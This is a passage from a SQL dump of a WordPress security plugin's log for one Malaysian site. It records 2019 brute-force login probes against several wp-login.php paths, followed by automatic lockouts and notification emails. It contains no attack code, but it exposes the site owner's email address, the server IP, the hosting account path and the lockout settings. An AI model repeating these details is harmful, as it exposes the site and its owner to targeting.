14:18:53',17930496,19336360,'https://bintara.com.my/wp/wp-login.php',1,0,'45.252.248.161'),(26217,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:18:54','2019-09-21 14:18:53',18137008,19336360,'https://bintara.com.my/wp/wp-login.php',1,0,'45.252.248.161'),(26218,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxXjDrcQxTmGrCWuaUiwAAAcQ\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"198.199.70.48\";s:11:\"REMOTE_PORT\";s:5:\"18088\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxXjDrcQxTmGrCWuaUiwAAAcQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075550.7614\";s:12:\"REQUEST_TIME\";s:10:\"1569075550\";}}','notice','2019-09-21 14:19:12','2019-09-21 14:19:11',17853472,19338856,'https://bintara.com.my/2019/wp-login.php',1,0,'198.199.70.48'),(26219,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:19:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:19:11\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:19:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:19:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:19:12','2019-09-21 14:19:11',17937288,19338856,'https://bintara.com.my/2019/wp-login.php',1,0,'198.199.70.48'),(26220,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:19:12','2019-09-21 14:19:11',18143640,19338856,'https://bintara.com.my/2019/wp-login.php',1,0,'198.199.70.48'),(26221,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxr3kXpgmG5P@iB8k8AgAAAJM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"166.62.84.17\";s:11:\"REMOTE_PORT\";s:5:\"36678\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxr3kXpgmG5P@iB8k8AgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075631.7189\";s:12:\"REQUEST_TIME\";s:10:\"1569075631\";}}','notice','2019-09-21 14:20:33','2019-09-21 14:20:32',17851184,19336752,'https://bintara.com.my/wp/wp-login.php',1,0,'166.62.84.17'),(26222,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:20:32\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:20:32\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:20:32\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:20:32\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:20:33','2019-09-21 14:20:32',17935024,19336752,'https://bintara.com.my/wp/wp-login.php',1,0,'166.62.84.17'),(26223,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:20:33','2019-09-21 14:20:32',18141536,19336752,'https://bintara.com.my/wp/wp-login.php',1,0,'166.62.84.17'),(26224,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxr3kXpgmG5P@iB8k8AwAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.94.203\";s:11:\"REMOTE_PORT\";s:5:\"58864\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxr3kXpgmG5P@iB8k8AwAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075631.9718\";s:12:\"REQUEST_TIME\";s:10:\"1569075631\";}}','notice','2019-09-21 14:20:33','2019-09-21 14:20:32',17855152,19339880,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.94.203'),(26225,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYxr3kXpgmG5P@iB8k8AwAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.94.203\";s:11:\"REMOTE_PORT\";s:5:\"58864\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYxr3kXpgmG5P@iB8k8AwAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075631.9718\";s:12:\"REQUEST_TIME\";s:10:\"1569075631\";}}','notice','2019-09-21 14:20:34','2019-09-21 14:20:32',18021968,19339880,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.94.203'),(26226,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:20:32\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:20:32\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:20:32\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:20:32\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:20:34','2019-09-21 14:20:32',18055728,19339880,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.94.203'),(26227,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:20:34','2019-09-21 14:20:32',18262464,19339880,'https://bintara.com.my/blog/wp-login.php',1,0,'139.59.94.203'),(26228,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYx2LfBTP0kPOVnb8jxiAAAAEo\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"89.22.52.17\";s:11:\"REMOTE_PORT\";s:5:\"60960\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYx2LfBTP0kPOVnb8jxiAAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075672.8556\";s:12:\"REQUEST_TIME\";s:10:\"1569075672\";}}','notice','2019-09-21 14:21:14','2019-09-21 14:21:13',17852160,19338248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'89.22.52.17'),(26229,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:21:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:21:13\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:21:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:21:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:21:14','2019-09-21 14:21:13',17936632,19338248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'89.22.52.17'),(26230,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:21:14','2019-09-21 14:21:13',18143232,19338248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'89.22.52.17'),(26231,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYx7zDrcQxTmGrCWuaUuwAAAdA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.244.150\";s:11:\"REMOTE_PORT\";s:5:\"37828\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYx7zDrcQxTmGrCWuaUuwAAAdA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075695.1615\";s:12:\"REQUEST_TIME\";s:10:\"1569075695\";}}','notice','2019-09-21 14:21:36','2019-09-21 14:21:35',17851600,19341848,'https://bintara.com.my/2019/wp-login.php',1,0,'128.199.244.150'),(26232,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:21:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:21:35\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:21:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:21:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:21:36','2019-09-21 